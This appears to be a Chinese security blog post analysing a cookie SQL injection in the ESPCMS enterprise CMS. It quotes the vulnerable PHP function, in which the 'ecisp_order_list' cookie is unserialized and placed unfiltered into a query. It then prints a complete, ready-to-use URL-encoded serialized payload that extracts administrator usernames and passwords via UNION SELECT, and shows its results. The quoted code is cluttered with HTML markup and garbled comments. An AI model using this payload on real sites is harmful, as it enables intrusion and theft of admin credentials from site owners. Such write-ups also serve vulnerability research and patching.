关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

最新ESPCMS漏洞之cookie注入分析

 feng 2013/04/06 16:27  475 ℃  0条点评

0×00  简介:

易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。

0×01  漏洞分析:

<span class="kwd">function</span><span class="pln"> in_list</span><span class="pun">()</span><span class="pun">{</span><span class="pln"> parent</span><span class="pun">::</span><span class="pln">start_pagetemplate</span><span class="pun">();</span><span class="pln"> $lng </span><span class="pun">=</span><span class="pun">(</span><span class="pln">admin_LNG </span><span class="pun">==</span><span class="str">'big5'</span><span class="pun">)</span><span class="pun">?</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">CON</span><span class="pun">[</span><span class="str">'is_lancode'</span><span class="pun">]</span><span class="pun">:</span><span class="pln"> admin_LNG</span><span class="pun">;</span><span class="pln"> $cartid </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">fun</span><span class="pun">-&gt;</span><span class="pln">accept</span><span class="pun">(</span><span class="str">'ecisp_order_list'</span><span class="pun">,</span><span class="str">'C'</span><span class="pun">);</span><span class="com">//æ¥æ¶cookies[âecisp_order_listâ]</span><span class="pln"> $cartid </span><span class="pun">=</span><span class="pln"> stripslashes</span><span class="pun">(</span><span class="pln">htmlspecialchars_decode</span><span class="pun">(</span><span class="pln">$cartid</span><span class="pun">));</span><span class="pln"> $uncartid </span><span class="pun">=</span><span class="pun">!</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$cartid</span><span class="pun">)</span><span class="pun">?</span><span class="pln"> unserialize</span><span class="pun">(</span><span class="pln">$cartid</span><span class="pun">)</span><span class="pun">:</span><span class="lit">0</span><span class="pun">;</span><span class="com">//$cartidæç¹æ®çæ ŒåŒèŠæ±</span><span class="kwd">if</span><span class="pun">(</span><span class="pln">$uncartid </span><span class="pun">&amp;&amp;</span><span class="pln"> is_array</span><span class="pun">(</span><span class="pln">$uncartid</span><span class="pun">))</span><span class="pun">{</span><span class="pln"> $didarray </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">fun</span><span class="pun">-&gt;</span><span class="pln">key_array_name</span><span class="pun">(</span><span class="pln">$uncartid</span><span class="pun">,</span><span class="str">'did'</span><span class="pun">,</span><span class="str">'amount'</span><span class="pun">);</span><span class="pln"> $didlist </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">fun</span><span class="pun">-&gt;</span><span class="pln">format_array_text</span><span class="pun">(</span><span class="pln">array_keys</span><span class="pun">(</span><span class="pln">$didarray</span><span class="pun">),</span><span class="str">','</span><span class="pun">);</span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$didlist</span><span class="pun">))</span><span class="pun">{</span><span class="pln"> $db_table </span><span class="pun">=</span><span class="pln"> db_prefix </span><span class="pun">.</span><span class="str">'document'</span><span class="pun">;</span><span class="pln"> $db_where </span><span class="pun">=</span><span class="str">"isclass=1 AND isorder=1 AND did in($didlist) ORDER BY did DESC"</span><span class="pun">;</span><span class="pln"> $sql</span><span class="pun">=</span><span class="str">"SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,addtime,template,filename,filepath FROM $db_table WHERE $db_where"</span><span class="pun">;</span><span class="com">//åšææé sql语å¥</span><span class="pln"> $rs </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">db</span><span class="pun">-&gt;</span><span class="pln">query</span><span class="pun">(</span><span class="pln">$sql</span><span class="pun">);</span><span class="com">//çæ¥åŠå¥æ¥è¯¢</span>

直接获取cookies[‘ecisp_order_list’]的值,没有经过过滤,直接被用来构造了sql语句,并带入了查询。所以此处形成了一个cookie注入。

0×02  难点:

接收到的cookies[‘ecisp_order_list’]在整个传递过程中,经过了htmlspecialchars_decode()、stripslashes()、unserialize()、key_array_name()、array_keys()、format_array_text()几个函数。

其中stripslashes()使得注入语句可以无视GPC的影响。

但是,由于unserialize()的使用,使得构造exp的难度加大;因为传入unserialize()的值,必须使用一种规定的特殊格式(实施上,我也没有完全吃透这个特殊格式)

我就依靠运气,和一点小技巧,成功地构造出了exp,这里就不细说了。大家可以通过打印几个函数的返回值,来找到构造的方法。(或者,也可以通过下面的exp,来找寻一些规律)

0×03  EXP:

<span class="pln">a</span><span class="pun">%</span><span class="lit">3a1</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">7bs</span><span class="pun">%</span><span class="lit">3a3</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">22k23</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3ba</span><span class="pun">%</span><span class="lit">3a2</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">7bs</span><span class="pun">%</span><span class="lit">3a3</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">22did</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3bs</span><span class="pun">%</span><span class="lit">3a159</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">2224</span><span class="pun">)+</span><span class="kwd">and</span><span class="pun">+</span><span class="lit">1</span><span class="pun">%</span><span class="lit">3d2</span><span class="pun">+</span><span class="kwd">union</span><span class="pun">+</span><span class="kwd">select</span><span class="pun">+</span><span class="lit">1</span><span class="pun">%</span><span class="lit">2c2</span><span class="pun">%</span><span class="lit">2c3</span><span class="pun">%</span><span class="lit">2c4</span><span class="pun">%</span><span class="lit">2c5</span><span class="pun">%</span><span class="lit">2c6</span><span class="pun">%</span><span class="lit">2c7</span><span class="pun">%</span><span class="lit">2c8</span><span class="pun">%</span><span class="lit">2c9</span><span class="pun">%</span><span class="lit">2c10</span><span class="pun">%</span><span class="lit">2c11</span><span class="pun">%</span><span class="lit">2c12</span><span class="pun">%</span><span class="lit">2c13</span><span class="pun">%</span><span class="lit">2c14</span><span class="pun">%</span><span class="lit">2c15</span><span class="pun">%</span><span class="lit">2c16</span><span class="pun">%</span><span class="lit">2cpassword</span><span class="pun">%</span><span class="lit">2cusername</span><span class="pun">%</span><span class="lit">2c19</span><span class="pun">%</span><span class="lit">2c20</span><span class="pun">%</span><span class="lit">2c21</span><span class="pun">%</span><span class="lit">2c22</span><span class="pun">%</span><span class="lit">2c23</span><span class="pun">%</span><span class="lit">2c24</span><span class="pun">%</span><span class="lit">2c25</span><span class="pun">%</span><span class="lit">2c26</span><span class="pun">%</span><span class="lit">2c27</span><span class="pun">%</span><span class="lit">2c28</span><span class="pun">%</span><span class="lit">2c29</span><span class="pun">%</span><span class="lit">2c30</span><span class="pun">%</span><span class="lit">2c31</span><span class="pun">+</span><span class="kwd">from</span><span class="pun">+</span><span class="pln">espcms_admin_member</span><span class="pun">+</span><span class="kwd">where</span><span class="pun">+</span><span class="lit">1</span><span class="pun">+</span><span class="kwd">in</span><span class="pun">+(</span><span class="lit">1</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3bs</span><span class="pun">%</span><span class="lit">3a6</span><span class="pun">%</span><span class="lit">3a</span><span class="pun">%</span><span class="lit">22amount</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3bi</span><span class="pun">%</span><span class="lit">3a1</span><span class="pun">%</span><span class="lit">3b</span><span class="pun">%</span><span class="lit">7d</span><span class="pun">%</span><span class="lit">7d</span>

0×04  利用方法:

其实大家都懂的,为了防止exp使用门槛过低(其实已经很低了),就不再一一展示利用过程了。

0×05  效果演示:

注入获取管理员信息:

espcms漏洞

官方后台:

espcms漏洞

作者:n3wf

文章下载地址:百度网盘

本文标签:
[转载]分析Discuz防注入函数绕过漏洞
XYCMS律师事务所建站系统注入漏洞
易思企业系统Espcms注入漏洞+后台拿shell易思企业系统Espcms注入漏洞+后台拿shell我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码